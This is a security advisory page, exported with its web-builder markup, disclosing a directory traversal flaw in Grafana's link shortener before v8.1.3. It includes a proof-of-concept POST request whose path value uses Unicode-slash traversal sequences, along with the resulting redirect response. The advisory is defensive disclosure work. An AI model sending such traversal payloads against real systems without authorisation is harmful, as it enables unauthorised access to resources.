{"id":17727,"date":"2022-01-31T17:34:22","date_gmt":"2022-01-31T16:34:22","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=17727"},"modified":"2022-02-01T11:02:02","modified_gmt":"2022-02-01T10:02:02","slug":"usd-2021-0024","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0024\/","title":{"rendered":"usd-2021-0024"},"content":{"rendered":"\n\n\n\n[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.13.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

usd-2021-0024 | Grafana<\/h1>\n

Advisory ID<\/strong>: usd-2021-0024
Affected Product<\/strong>: Grafana
Affected Version<\/strong>: < v8.1.3
Vulnerability Type<\/strong>: CWE-20: Improper Input Validation (https:\/\/cwe.mitre.org\/data\/definitions\/20.html)
Security Risk<\/strong>: Low
Vendor URL<\/strong>: https:\/\/grafana.com\/\u00a0<\/a>
Vendor Status<\/strong>: Fixed<\/p>\n

<\/span><\/p>\n

Description<\/h3>\n

Grafana before v8.1.3 is vulnerable to Directory Traversal in its Link-Shortener.<\/p>\n

If the Grafana instance is deployed alongside multiple applications on the same domain, this directory traversal allows to reference arbitrary files within the web root.<\/p>\n

Grafana allows users to shorten their sharing links using a link shortener functionality. There is a filter in place that only allows relative URLs. In doing so, meta characters like\u00a0 \u2215<\/span>.. \u2215<\/span><\/strong>\u00a0are allowed, resulting in the possiblity to reference arbitrary resources outside of Grafana's base path.<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

Note: the setup that was analyzed consisted of multiple applications that were deployed to different paths of the same domain (usd.de\/a\/, usd.de\/b\/, ...).<\/em><\/p>\n

An exemplary request including a directory traversal is given in the following:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]

POST \/monitoring\/api\/short-urls HTTP\/2
Host: usd.de
[...]<\/p>\n

{
\"path\":\"pentest\/..\u2215<\/span>..\u2215<\/span>test\"
}<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.13.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

The API responds with a shortened URL. If this URL is then opened, there is a redirect to arbitrary paths on the domain:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]

HTTP\/2 302 Found
Content-Length: 76
Location: https:\/\/usd.de\/monitoring\/pentest\/..\u2215<\/span>..\u2215<\/span>test
Cache-Control: no-cache
[...]<\/p>\n

<a href=\"https:\/\/usd.de\/monitoring\/pentest\/..\u2215<\/span>..\u2215<\/span>test\">Found<\/a>.<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.13.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

\n
\n

Fix<\/h3>\n

It is recommended to harden the link shortener implementation. In doing so, consider all user input to the application as potentially malicious. All input to the application should be verified and if necessary replaced. Meta characters should be treated with care. It is recommended to use whitelisting wherever possible.<\/p>\n

<\/h3>\n

References<\/h3>\n